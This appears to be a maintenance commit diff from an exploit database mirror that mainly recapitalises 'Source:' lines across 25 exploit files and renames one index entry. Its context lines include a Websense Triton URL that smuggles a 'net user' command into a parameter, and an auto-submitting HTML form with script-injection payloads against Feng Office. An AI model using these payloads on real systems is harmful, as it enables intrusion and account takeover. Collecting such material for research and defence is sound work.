DB: 2016-11-13
This commit is contained in:
parent
8a72733f20
commit
3c006aac19
25 changed files with 28 additions and 28 deletions
|
@ -36807,4 +36807,4 @@ id,file,description,date,author,platform,type,port
|
|||
40746,platforms/php/webapps/40746.php,"e107 CMS 2.1.2 - Privilege Escalation",2016-11-09,"Kacper Szurek",php,webapps,0
|
||||
40749,platforms/php/webapps/40749.txt,"MyBB 1.8.6 - Cross-Site Scripting",2016-11-10,"Curesec Research Team",php,webapps,80
|
||||
40750,platforms/php/webapps/40750.txt,"4Images 1.7.13 - SQL Injection",2016-11-10,0x4148,php,webapps,0
|
||||
40751,platforms/php/webapps/40751.txt,"vBulletin 4.2.3 - SQL Injection",2015-08-25,"Manish Tanwar",php,webapps,0
|
||||
40751,platforms/php/webapps/40751.txt,"vBulletin 4.2.3 - 'ForumRunner' SQL Injection",2015-08-25,"Manish Tanwar",php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
|
@ -1,4 +1,4 @@
|
|||
Source: http://www.securityfocus.com/bid/45211/discuss
|
||||
source: http://www.securityfocus.com/bid/45211/discuss
|
||||
|
||||
Real Estate Single is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
Source: http://www.securityfocus.com/bid/45212/discuss
|
||||
source: http://www.securityfocus.com/bid/45212/discuss
|
||||
|
||||
Multi Agent System is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
|
|
|
@ -1,5 +1,5 @@
|
|||
/*
|
||||
* Source: http://www.securityfocus.com/bid/43060/info
|
||||
* source: http://www.securityfocus.com/bid/43060/info
|
||||
* 18.08.2010, babcia padlina
|
||||
* FreeBSD 7.0 - 7.2 pseudofs null ptr dereference exploit
|
||||
*
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
Source: http://www.securityfocus.com/bid/51086/info
|
||||
source: http://www.securityfocus.com/bid/51086/info
|
||||
|
||||
Websense Triton is prone to a remote command-execution vulnerability.
|
||||
|
||||
|
@ -10,7 +10,7 @@ https://www.example.com/explorer_wse/ws_irpt.exe?&SendFile=echo.pdf%26net user a
|
|||
|
||||
###################################################
|
||||
|
||||
Source: http://www.securityfocus.com/bid/51088/info
|
||||
source: http://www.securityfocus.com/bid/51088/info
|
||||
|
||||
Websense Triton 'favorites.exe' HTML Injection Vulnerability
|
||||
|
||||
|
@ -37,7 +37,7 @@ https://www.example.com/explorer_wse/favorites.exe?Program=ws_irpt.exe¶ms=st
|
|||
###################################################
|
||||
|
||||
|
||||
Source: http://www.securityfocus.com/bid/51085/info
|
||||
source: http://www.securityfocus.com/bid/51085/info
|
||||
|
||||
Websense Triton Report Management Interface Cross Site Scripting Vulnerability
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
# Source: http://www.securityfocus.com/bid/43084/info
|
||||
# source: http://www.securityfocus.com/bid/43084/info
|
||||
|
||||
#!/bin/sh
|
||||
# by fuzz. For Anux inc. #
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
Source: http://www.securityfocus.com/bid/42596/info
|
||||
source: http://www.securityfocus.com/bid/42596/info
|
||||
|
||||
MySQL is prone to a denial-of-service vulnerability.
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
Source: http://www.securityfocus.com/bid/44987/info
|
||||
source: http://www.securityfocus.com/bid/44987/info
|
||||
|
||||
Wireshark is prone to a buffer-overflow vulnerability.
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
Source: http://www.securityfocus.com/bid/45634/info
|
||||
# source: http://www.securityfocus.com/bid/45634/info
|
||||
|
||||
#!/usr/bin/env python
|
||||
|
||||
|
|
|
@ -1,5 +1,5 @@
|
|||
/*
|
||||
Source: http://www.securityfocus.com/bid/46563/info
|
||||
source: http://www.securityfocus.com/bid/46563/info
|
||||
|
||||
GNU glibc is prone to a stack-corruption vulnerability.
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
Source: http://www.securityfocus.com/bid/52735/info
|
||||
source: http://www.securityfocus.com/bid/52735/info
|
||||
|
||||
Wireshark is prone to a remote denial-of-service vulnerability caused by a NULL-pointer-dereference error.
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
Source: http://www.securityfocus.com/bid/53652/info
|
||||
source: http://www.securityfocus.com/bid/53652/info
|
||||
|
||||
Wireshark is prone to a denial-of-service vulnerability because it fails to properly allocate memory.
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
Source: http://www.securityfocus.com/bid/53651/info
|
||||
source: http://www.securityfocus.com/bid/53651/info
|
||||
|
||||
Wireshark is prone to multiple denial-of-service vulnerabilities.
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
Source: http://www.securityfocus.com/bid/53653/info
|
||||
source: http://www.securityfocus.com/bid/53653/info
|
||||
|
||||
Wireshark is prone to a denial-of-service vulnerability.
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
Source: http://www.securityfocus.com/bid/55651/info
|
||||
source: http://www.securityfocus.com/bid/55651/info
|
||||
|
||||
Oracle Database is prone to a remote security-bypass vulnerability that affects the authentication protocol.
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
Source: http://www.securityfocus.com/bid/43507/info
|
||||
source: http://www.securityfocus.com/bid/43507/info
|
||||
|
||||
Tiki Wiki CMS Groupware is prone to a local file-include vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
Source: http://www.securityfocus.com/bid/46846/info
|
||||
source: http://www.securityfocus.com/bid/46846/info
|
||||
|
||||
Joomla! is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
Source: http://www.securityfocus.com/bid/53463/info
|
||||
source: http://www.securityfocus.com/bid/53463/info
|
||||
|
||||
Galette is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
Source: http://www.securityfocus.com/bid/60823/info
|
||||
source: http://www.securityfocus.com/bid/60823/info
|
||||
|
||||
GLPI is prone to a remote PHP code-execution vulnerability.
|
||||
|
||||
|
|
|
@ -1,10 +1,10 @@
|
|||
Source: http://www.securityfocus.com/bid/47049/info
|
||||
source: http://www.securityfocus.com/bid/47049/info
|
||||
|
||||
<html>
|
||||
<body onload="document.forms[0].submit()">
|
||||
<form method="POST" action="http://localhost/feng_community/public/assets/javascript/slimey/save.php">
|
||||
<input type="hidden" name="filename" value=""><script>alert(0)</script>" />
|
||||
<input type="hidden" name="slimContent" value="</textarea><script>alert(0)</script>" />
|
||||
<input type="hidden" name="slimContent" value="</textarea><script>alert(0)</script>" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
|
@ -1,4 +1,4 @@
|
|||
Source: http://www.securityfocus.com/archive/1/509995
|
||||
source: http://www.securityfocus.com/archive/1/509995
|
||||
|
||||
======================================================================
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
Source: http://www.securityfocus.com/bid/54919/info
|
||||
source: http://www.securityfocus.com/bid/54919/info
|
||||
|
||||
Solaris 10 Patch 137097-01 is prone to a local privilege-escalation vulnerability.
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
# Source: http://www.securityfocus.com/bid/39630/info
|
||||
# source: http://www.securityfocus.com/bid/39630/info
|
||||
|
||||
Microsoft Windows is prone to a local privilege-escalation vulnerability.
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
Source: http://www.securityfocus.com/bid/42269/info
|
||||
source: http://www.securityfocus.com/bid/42269/info
|
||||
|
||||
Microsoft Windows is prone to a local privilege-escalation vulnerability.
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
Source: http://www.securityfocus.com/bid/46856/info
|
||||
source: http://www.securityfocus.com/bid/46856/info
|
||||
|
||||
Symantec LiveUpdate Administrator is prone to an HTML-injection vulnerability.
|
||||
|
||||
|
|
Loading…
Add table
Reference in a new issue